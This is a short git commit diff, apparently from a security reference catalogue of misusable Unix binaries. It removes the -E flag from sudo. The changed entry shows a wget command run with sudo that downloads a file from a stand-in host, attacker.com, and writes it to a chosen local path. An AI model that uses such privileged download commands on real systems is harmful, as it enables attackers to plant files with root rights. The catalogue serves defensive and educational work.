Remove useless instances of sudo -E

This commit is contained in:
Andrea Cardaci
2020-06-10 22:53:45 +02:00
parent fbd887e91a
commit 9cd6849b8e
5 changed files with 5 additions and 5 deletions

View File

@@ -23,5 +23,5 @@ functions:
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
sudo -E wget $URL -O $LFILE
sudo wget $URL -O $LFILE
---